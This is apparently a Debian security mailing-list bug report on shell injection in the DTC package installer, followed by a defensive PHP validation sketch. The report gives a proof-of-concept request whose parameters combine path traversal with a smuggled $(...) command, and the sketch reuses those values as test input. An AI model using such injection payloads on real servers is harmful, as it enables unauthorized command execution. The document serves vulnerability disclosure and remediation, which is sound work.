[Secure-testing-team] Bug#637630: shell injection in package installer
Ansgar Burchardt
ansgar at debian.org
Sat Aug 13 09:00:01 UTC 2011
Package: src:dtc
Version: 0.32.10-2
Severity: critical
Tags: security upstream
The package installer helpfully allows users to run shell code:
wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'
Ansgar
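
A defensive sketch of the input handling this report calls for, as an added example that is not DTC's code and not part of the original message. Only the `pkg` and `dtcpkg_directory` parameter names come from the request above; the function names, the placeholder base directories and the `cp` command are assumptions for illustration.

```php
<?php
// Added example, not DTC code. Function names, the two base directories and
// the cp command are hypothetical; only the parameter names are from the report.

// Accept one plain path component: no "/", no "..", no shell metacharacters.
function safe_component($value): ?string
{
    if (!is_string($value)) {
        return null; // e.g. pkg[]=x arrives as an array
    }
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $value) === 1 ? $value : null;
}

// Resolve an existing entry under $base and confirm it did not escape via a symlink.
function resolve_under(string $base, string $component): ?string
{
    $baseReal = realpath($base);
    $target = realpath($base . '/' . $component);
    if ($baseReal === false || $target === false) {
        return null;
    }
    return strpos($target, $baseReal . '/') === 0 ? $target : null;
}

function install_package(string $pkgBase, string $webRoot, array $params): bool
{
    $pkg = safe_component($params['pkg'] ?? null);
    $dir = safe_component($params['dtcpkg_directory'] ?? null);
    $rootReal = realpath($webRoot);
    if ($pkg === null || $dir === null || $rootReal === false) {
        return false;
    }
    $src = resolve_under($pkgBase, $pkg);
    if ($src === null) {
        return false;
    }
    // escapeshellarg() single-quotes each value for a POSIX shell, so $(...)
    // and backticks reach cp as literal text instead of being expanded.
    $cmd = 'cp -r -- ' . escapeshellarg($src) . ' ' . escapeshellarg($rootReal . '/' . $dir);
    exec($cmd, $output, $status);
    return $status === 0;
}

// Constructed input mirroring the reported request; both values fail validation.
$reported = [
    'pkg' => '../../../../../../../../../tmp',
    'dtcpkg_directory' => '$(touch /tmp/more-owned)/tmp/foo',
];
var_dump(install_package('/srv/example/packages', '/srv/example/www', $reported));
```

The allowlist check is the primary control; quoting with `escapeshellarg()` is kept as a second layer in case the pattern is later loosened.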